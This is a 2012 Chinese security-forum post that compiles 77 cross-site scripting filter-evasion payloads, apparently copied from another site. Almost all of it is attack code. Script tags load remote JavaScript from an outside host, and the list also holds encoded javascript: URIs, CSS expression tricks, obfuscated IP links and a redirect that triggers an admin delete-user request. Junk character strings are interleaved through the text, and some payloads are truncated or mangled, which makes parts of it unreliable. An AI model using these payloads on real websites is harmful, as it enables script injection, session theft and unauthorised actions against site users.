找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3465|回复: 0
打印 上一主题 下一主题

xss跨站脚本攻击汇总

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-5 14:56:34 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
; P: J, u$ S, [5 S) \
6 ]3 b- ]' F6 ]. D7 a (1)普通的XSS JavaScript注入' _! i1 t' N5 F# g
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
: U3 _- f6 S2 m1 A0 p3 N2 S+ s
, g+ ^# i5 n' w+ [+ D (2)IMG标签XSS使用JavaScript命令
( l! W+ _" d+ L. ~0 s9 p9 t <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>/ w: ]# F& R7 S5 o! F3 W
) [8 B. e& ]! \8 n1 `& m1 K3 Y
(3)IMG标签无分号无引号+ R7 c4 \! y& ^- u
<IMG SRC=javascript:alert(‘XSS’)>
8 f0 S- w! y9 ]+ J) t/ K
: j" B! D0 N* Y! B( n (4)IMG标签大小写不敏感
8 o, [$ \1 ]) q5 ~: [ <IMG SRC=JaVaScRiPt:alert(‘XSS’)>
! q* ]8 K# b, U- }1 m. ]+ c
$ U- d0 x5 ^1 C5 o (5)HTML编码(必须有分号)
7 O- h2 v/ z9 w( f# J& ] <IMG SRC=javascript:alert(“XSS”)>; S6 d" N. b  J  W& z$ C

& A1 x0 a, n  E* d7 Z# o (6)修正缺陷IMG标签! W7 e7 N3 S3 C1 @. p& g4 H
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>* R$ t3 p" H! x, k
2 r+ Z3 C' i. h1 t
(7)formCharCode标签(计算器)
  C1 t! t( t! X1 v <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
! m) y5 U' g' [0 |+ e+ [
6 K/ ?$ b3 z7 @! s (8)UTF-8的Unicode编码(计算器)
( ]6 }/ z0 c9 y4 {( u <IMG SRC=jav..省略..S')>  _; M- a  e9 I- Z

$ M3 ]1 |+ h2 z" x9 J7 @1 P( D# i (9)7位的UTF-8的Unicode编码是没有分号的(计算器)0 q* f9 n, j. [$ z1 F
<IMG SRC=jav..省略..S')>" q8 |4 B- H8 }% e7 Y" d1 v

6 m8 A* B- `$ N% k" V0 N- b! h (10)十六进制编码也是没有分号(计算器)# X* e, G' E" J
<IMG SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29>+ p. y, F2 _  L
% k: c# K+ T! r$ ~( F/ ~1 l
(11)嵌入式标签,将Javascript分开$ e) i' m% M/ f$ H% m1 y: z3 Y9 K' E
<IMG SRC=”jav ascript:alert(‘XSS’);”>7 d- B2 T  ]! d2 z* a+ [4 Z

" w* G: e* x; q+ _* v (12)嵌入式编码标签,将Javascript分开- x5 G8 @  h! t9 D) }5 G
<IMG SRC=”jav ascript:alert(‘XSS’);”>1 P" O- m" Y- M) [2 r. G8 j
- ^- }+ z  b" F! f6 d; X" F8 x9 ]
(13)嵌入式换行符4 ^; ~1 D0 I/ ^
<IMG SRC=”jav ascript:alert(‘XSS’);”>! |; Z7 {/ o4 h- p$ W* e

  |' s' F  V5 L (14)嵌入式回车& O3 s: N* @: k2 I, u
<IMG SRC=”jav ascript:alert(‘XSS’);”>1 B; q6 s: ]+ s* z/ I6 a: X
7 y/ R1 {( D& ?# y5 X/ g4 Z
(15)嵌入式多行注入JavaScript,这是XSS极端的例子3 x# u9 A: M/ w6 X% v3 `
<IMG SRC=”javascript:alert(‘XSS‘)”>- X5 w- a- r- @+ |! o  l% V9 x1 W( h

( s+ h1 D8 [! k9 t% v  {, R: v (16)解决限制字符(要求同页面)
( s4 D( a0 a4 h <script>z=’document.’</script>4 m3 t. ?2 ?8 f, ?  W
<script>z=z+’write(“‘</script>8 D' I3 ?% W; f/ D
<script>z=z+’<script’</script>
! D6 F# V# I8 e  i0 ?$ P <script>z=z+’ src=ht’</script>9 h7 n& P  G& D  Q2 Y2 c
<script>z=z+’tp://ww’</script>3 S/ ^/ t. V1 M( N- g9 F
<script>z=z+’w.shell’</script>
" t9 q( f/ w$ O; C( S <script>z=z+’.net/1.’</script>
8 j+ Q4 z! z* p, M1 I! w% q, H <script>z=z+’js></sc’</script>& L: w+ I) q7 {, \; ^
<script>z=z+’ript>”)’</script>
/ B2 u& Y) w% q! ?7 L, U <script>eval_r(z)</script>$ |% l$ ~8 e/ B; k: U% ?6 L

% Z& F% K2 ]/ n8 }8 h7 j" D2 q (17)空字符
4 ]2 t$ ]& a3 [9 I1 Z perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
2 x; k5 c- T' z$ W; @- W/ T: v; s- L. B* P# H2 v
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
( x6 X3 H  h+ o' w" b( o* ` perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
/ ]$ G) c3 _' Z" V. M# x
4 Z. F% P0 z% V2 J& m1 W9 ^! @ (19)Spaces和meta前的IMG标签
4 ~8 l# g6 Z! n  K8 p2 @, G <IMG SRC=”   javascript:alert(‘XSS’);”>7 |7 O6 y/ S2 q$ Z
0 G2 i1 Y0 S; k+ G( h/ z5 {
(20)Non-alpha-non-digit XSS8 c& R8 w) I8 m- O; K
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
. U" X, J! c3 @2 L" k3 u+ h9 V$ B1 k+ W6 Z3 v, r
(21)Non-alpha-non-digit XSS to 2
2 g( z4 C! e+ @ <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
# W$ U  V4 e/ I( |) e( A! b  G& B% O; i8 y- D
(22)Non-alpha-non-digit XSS to 3, T7 o) O5 e, c+ a* v
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>2 [0 q1 W( n  ]1 v5 l5 v9 v

) c* B5 i7 A. s+ S* w( k3 r (23)双开括号# ?& V+ S5 c# z. f) [7 q
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
8 R6 Q* p+ R1 C) B& V+ e( c0 X9 {9 [1 K7 m) e* P+ ?0 G; X% O
(24)无结束脚本标记(仅火狐等浏览器)) D% X8 P7 o7 z( k& Q
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
  r" {0 P; }7 i4 h' z; E4 P! f7 X7 J) D4 t2 r0 l3 w4 x, G1 z% W
(25)无结束脚本标记2
# w: }  M8 r6 S; G, O <SCRIPT SRC=//3w.org/XSS/xss.js>  x6 R5 d% j/ i7 s4 R4 H

9 Q: h# b, b* ]6 z) f' v (26)半开的HTML/JavaScript XSS
# j! p, D4 c& V. M, j9 t <IMG SRC=”javascript:alert(‘XSS’)”
* S9 l! J5 r. J' W5 m: ^. c, T! q( _2 |$ w) g. J- k
(27)双开角括号) n* a0 V* {" O* T0 B0 t
<iframe src=http://3w.org/XSS.html <
. D6 Y8 X" ^/ A% W; L* U' D
' p! A+ l, p4 n8 V; w (28)无单引号 双引号 分号% z  u! G" ~, a# @$ ]9 ~( M8 ^
<SCRIPT>a=/XSS/9 ?7 ]( j" c6 E- d3 Z* H3 Z0 G
alert(a.source)</SCRIPT>0 a  q7 o* G/ ?6 \3 V: v* u( \! q/ }2 {

; t, X8 s; p  I$ L% n (29)换码过滤的JavaScript
0 H' e$ k% @$ \4 V% @# J1 {6 R8 K \”;alert(‘XSS’);//3 _( z) }) H: I  z% o4 [
9 S) ~' d; q7 d; ]+ w! [9 D
(30)结束Title标签
$ ]4 }# [" i- a </TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
" S8 `) @8 T: w
5 [. A3 `' i5 A* \0 ~6 _% D (31)Input Image/ o" X1 O7 S3 Y2 }
<INPUT SRC=”javascript:alert(‘XSS’);”>
% e7 k# B5 |' A0 B  J9 V
8 S- `  |6 a  ?8 o6 } (32)BODY Image
# y2 m3 h3 l5 J+ D/ m$ O <BODY BACKGROUND=”javascript:alert(‘XSS’)”>
4 z# {2 Z% `$ E% j- H# M/ R# h& A* d+ W+ W+ r3 q/ h
(33)BODY标签4 R9 p! a4 l9 d$ M
<BODY(‘XSS’)>
, E# L4 G! u, @9 p- s7 g+ i2 }
1 M5 X7 L& S! q. V1 G/ \. q6 N# | (34)IMG Dynsrc
- j! z# M& `9 ~ <IMG DYNSRC=”javascript:alert(‘XSS’)”>
$ g& [7 g0 o! S0 M3 g- x: W* X! x5 \* X8 ^5 U% p; h
(35)IMG Lowsrc
( W7 i" @* `4 I" x# d7 e <IMG LOWSRC=”javascript:alert(‘XSS’)”>4 o. [. S" y/ \
4 M- z* w! a9 U
(36)BGSOUND
7 u+ c# k# U) H6 Q2 @' J <BGSOUND SRC=”javascript:alert(‘XSS’);”>4 r0 W+ l2 w- Y# J. |6 Q- Z2 }
3 m) V" h9 O" e  }! J  V5 R" \
(37)STYLE sheet2 o4 F) m, d! N0 k# K) c
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
" M( w5 F$ i  x6 y$ n- s
9 R* t1 b  n' i% B  U, p4 Q (38)远程样式表
. v( j( v8 M: \9 J% i <LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>  I2 x! ?1 p8 m0 p1 w# B4 ]9 v

7 H  {9 G8 c* ]8 k1 A (39)List-style-image(列表式)! [, c- ?( ?1 P- i9 s3 w
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS( O, k0 d: `( I$ Q$ c

5 S$ B" L3 k7 D (40)IMG VBscript
) s+ A9 i# C6 f  ~0 ~ <IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS8 v) K& p! a' p6 i: J+ p7 h
, r: x% E  B2 T5 r- C. J
(41)META链接url+ u, ]; r: \4 {* U( o
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>) N3 P6 ^' F5 j( a: j. ^

6 j' G7 z! I/ t% V8 \8 N8 K4 a (42)Iframe
  m$ ~# B: I* l <IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>6 i1 L) K1 H4 L, E) r

3 z4 h, E$ n: H9 A& ~ (43)Frame
- J% {- a5 ^6 |9 U. e <FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>1 g6 E; J. D" H" p# ?3 e: S' J
; l4 y/ ?0 S' `2 w9 h5 f% \1 W
(44)Table
4 ~' v0 S0 a7 A" h4 U3 l <TABLE BACKGROUND=”javascript:alert(‘XSS’)”>1 o% |7 T, ]0 A3 c5 @
$ G1 R8 l+ n+ H7 |7 b1 k
(45)TD1 [3 r) L8 F( i# k8 J$ y3 h% |1 n
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
3 Z. L- ~" N2 K3 o  P% E! R$ M' D! V) ~5 _  W
(46)DIV background-image
$ G# Z" I, T' f4 @: g( Q% r <DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
  u% o% @/ {6 Q& C
0 F6 x" l8 c/ t0 h# m1 t; Z (47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
3 ~# K4 W( [- _! V: o  T <DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
/ V0 x. L/ W! w; c  B3 H; |1 e4 E! F& D
(48)DIV expression
. C: N# W2 n* r" A2 r <DIV STYLE=”width: expression_r(alert(‘XSS’));”>4 A/ F+ P1 ~. T3 M# d  P

" O3 \1 |; b* k  B4 e1 _3 u (49)STYLE属性分拆表达3 Z3 q' b4 \6 ?9 A% V) ?; j
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
. C: r) Z# G9 l$ [) _3 y" F3 T9 }* z) U$ E: c
(50)匿名STYLE(组成:开角号和一个字母开头)7 p/ P2 Z) q, U, C( u; M
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
& A+ H4 k1 @5 O/ X+ p2 ?, {2 j- d/ B4 c1 p6 ^! e" D* w
(51)STYLE background-image  n% o7 {$ L' ^) B7 A
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
7 J& S' v- i  w1 }! v1 u: j; D
( _7 |4 b7 c/ n9 d( y! R5 N  m9 I (52)IMG STYLE方式
7 t+ B" H) B6 d, u  C7 j+ s/ s exppression(alert(“XSS”))’>
  A- g2 c6 j9 V" I' B# {+ D" N9 b
* ?- ^7 o* b1 l0 ]2 D0 P (53)STYLE background
% d7 t( C3 F# n/ B% _ <STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>' p( X4 h, }/ ?# U6 x) `

3 I/ ^! B6 T2 u! ^5 g. i* N (54)BASE
0 K# {4 w* w$ h; `  M: F5 m* A <BASE HREF=”javascript:alert(‘XSS’);//”>! t" Q5 x  W+ H2 j7 w5 _" U, h
9 e& r" H  p* S9 |( m
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS# w4 x0 S( @6 E% r5 Y
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
4 E$ P7 ]- x: d+ c8 X5 a7 j/ m/ e
* v$ V6 w* a8 c. g% x9 e (56)在flash中使用ActionScrpt可以混进你XSS的代码1 C. G) c" g% z- v' e0 n3 s, s
a=”get”;7 o7 z, a* n. U+ q$ i
b=”URL(\”";
2 P/ R2 D. p9 t: A5 ]+ _  l c=”javascript:”;
) t& j# S( ?( B$ u# K% [ d=”alert(‘XSS’);\”)”;# e$ j+ ?/ c+ L% K9 w9 a
eval_r(a+b+c+d);: [1 g5 y" j2 p( L

) U3 {! R- G7 \2 w (57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
8 F0 p$ r/ `6 C <HTML xmlns:xss>
/ s2 U. J" Y' ^' n, [+ H <?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>. r9 {# O( ?. `; c+ f% b" P% g8 m
<xss:xss>XSS</xss:xss>6 d) w/ ]# R$ V  c! y" K- m* ]
</HTML>
9 f2 m% f% `0 k- {7 y: n, n5 F# ]6 b2 H+ E4 Q
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
) ^# [$ w5 g% k+ |8 k5 T <SCRIPT SRC=””></SCRIPT>
$ Z2 t# C) t' v4 d* c- g& N4 E. i0 J( G' z( W
(59)IMG嵌入式命令,可执行任意命令
! P+ l: F* {- V* V  Z <IMG SRC=”http://www.XXX.com/a.php?a=b”>
8 Y2 M6 T0 V8 v4 y/ \0 N  R, j! K. l, p7 i7 p
(60)IMG嵌入式命令(a.jpg在同服务器)
, [! L, m7 V3 J# L Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
( ~7 K! r( E5 S! b6 q$ x& W& X& @$ T! A% E3 I$ B
(61)绕符号过滤
3 `+ X3 t' z7 f# g4 d <SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>1 s0 ~' H7 [6 L5 }( o

# o7 U$ f( S; `$ z& Q2 Q$ v (62)
& _1 |- S9 k# F3 \1 ]6 I <SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
- a; |+ H5 Q' v5 `' D* \- n
$ r! L& r/ ]) ]/ E0 i( ^& v (63)
, Y4 J8 F1 G  K) W8 E/ T <SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
5 z' x1 b8 b, l% @. N. E1 \$ _) }
/ ?" H- [1 J/ q0 ^ (64)
4 x: ?* o$ o  {7 o) U- z <SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>$ m; u8 ^# n2 O& `1 V
* J$ S+ w/ V# m0 p/ `4 @
(65)# H* }% }7 Y7 Z- w" {) R
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>0 j# O$ g+ n9 P% m2 |: T* m% n

- \, _, i' R1 t0 |, R& I (66)
6 p* |3 t: y- J- `# R <SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
8 l) u: C" v, \' Z
2 b2 N) p2 e& W" {. J (67)
" A2 U. a' q! w <SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>
3 _) a# v( U+ @0 `$ W) W( f4 W
- M1 A: f# F% p: N- D (68)URL绕行
* g9 u2 u/ k7 ~+ s" i7 e <A HREF=”http://127.0.0.1/”>XSS</A>
& G; l8 X$ I1 o  o; r' X- b
# n' c1 ?) {5 j/ f5 D! m (69)URL编码
. f# s8 C: _2 z9 Q <A HREF=”http://3w.org”>XSS</A>
7 ]: F+ {+ c' k* M0 Z6 o% s* G8 ]5 x! v! W9 h" v
(70)IP十进制
* f7 K8 ]: a) {& t# r <A HREF=”http://3232235521″>XSS</A>9 `4 I0 K2 r/ _4 J1 ?; U

9 Y  d' J. w" { (71)IP十六进制% e( m# O0 {( {% H/ Y/ {/ x
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>% D  ?% w! H* _6 U3 x" E
$ e7 ~9 \( B- O# q& t" F* n
(72)IP八进制! m5 s0 s, \" L0 _. }
<A HREF=”http://0300.0250.0000.0001″>XSS</A>
% p3 g7 k9 {# k" Z& _  k$ Y& k$ U! T% M3 c2 f
(73)混合编码. o5 t8 h& u: M6 s+ ?
<A HREF=”h
- a6 `# X$ j* R% y2 L; }) S tt p://6 6.000146.0×7.147/”">XSS</A>
1 c1 R0 P1 H6 U, e
. d$ L# D7 \  ^8 W (74)节省[http:]
+ W4 S+ D* T  V! C8 D( ]( A <A HREF=”//www.google.com/”>XSS</A>  r7 x$ G# H% r" T- O; T
9 y" m) q2 [; m
(75)节省[www]
' [9 h. W1 {3 X$ N; | <A HREF=”http://google.com/”>XSS</A>/ X# H2 C' j! V! B

2 K4 c1 b* N$ Y0 l (76)绝对点绝对DNS
! V# R$ U/ ]- j <A HREF=”http://www.google.com./”>XSS</A>
- P3 {) q; \! h# }' \
  _0 S4 R& M8 [. x# f/ x! r (77)javascript链接9 Q" n* Q& Q& \/ V
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表